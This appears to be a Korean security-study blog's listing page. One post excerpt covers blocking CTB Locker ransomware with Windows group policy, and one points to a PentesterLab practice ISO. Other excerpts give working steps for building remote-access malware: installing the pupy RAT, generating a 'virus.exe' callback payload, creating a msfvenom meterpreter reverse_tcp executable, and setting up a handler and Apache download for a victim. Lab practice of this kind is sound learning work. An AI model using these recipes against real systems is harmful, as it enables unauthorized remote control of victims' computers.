8. 정보보안 노트 정리28 랜섬웨어 예방법 - 그룹 보안정책 설정 랜섬웨어를 예방할수 있는 방법! /* CTB Locker - Crito 락커 데이터파일이나 문서파일을 암호화시키는 랜섬웨어 주요 공격대상 - windows 운영체제 토르서버와 통신하여 명령 및 지원을 받으며, 확장자가 exe로 된 랜덤파일이 생기고 컴퓨터 로그인 시마다 작업관리자에 프로세스가 랜덤으로 실행됨 */ 이 예방법은 .exe 랜섬웨어 파일을 랜덤하게 여러곳에 숨겨서 만드는것을 막기 위해서 숨겨지는 path의 exe 그룹 보안 정책을 허용 안함으로 설정해서 예방하는 방법입니다. 제어판 - 관리도구 - 그룹 정책 편집 - (컴퓨터구성-windows설정-보안 설정-소프트웨어 제한 정책-추가 규칙) 추가 규칙에 오른쪽 클릭하여 새 경로 규칙 만들기를 눌러주고 랜섬웨어가 생성되는 경로에 ex)%AppDa.. 2023. 12. 27. RAT(Remote Access Trojan) 툴 pupy 설치하기 1.git clone으로 설치 2.git submodule init 3.git submodule update 4../install.sh 혹은 pupy/pupy 폴더 안에서 pip install -r requirements.txt 5.pupy/pupy 폴더 안에서 ./pupygen.py -O windows -A x64 -o virus.exe connect --host 192.168.1.1 --transport ssl 로 바이러스 생성 6.pupy.conf 파일을 열어 address와 port룰 변경 7.pupysh.py를 실행 2023. 12. 26. 메타스플로잇 핸들러와 msfvenom 사용하기 1. msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.0 lport=444 -f exe -o virus.exe 2.핸들러 : 파일 생성 -> leafpad handler.rc 안의 내용 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.0.0 set lport 4444 exploit 3.service apache2 start 후 /var/www/html 에 msfvenom 한 바이러스를 넣어줄시 해당 피해자 컴퓨터 브라우저 주소창에 해커 아이피주소/바이러스파일명.exe 입력시 다운이 받아진다. 4.쉘 악성코드 생성 : msfvenom -a .. 2023. 12. 26. PentesterLab [해킹 실습용 웹사이트 구성] https://www.pentesterlab.com/exercises/from_sqli_to_shell/attachments PentesterLab: Learn Web App Pentesting! ISO The ISO for this exercise can be downloaded by clicking here (169MB). www.pentesterlab.com iso 파일을 다운로드 후 리눅스 32bit, 네트워크는 호스트 전용 어댑터로 변경하여 사용합니다. 2023. 12. 26. 이전 1 2 3 4 5 6 7 다음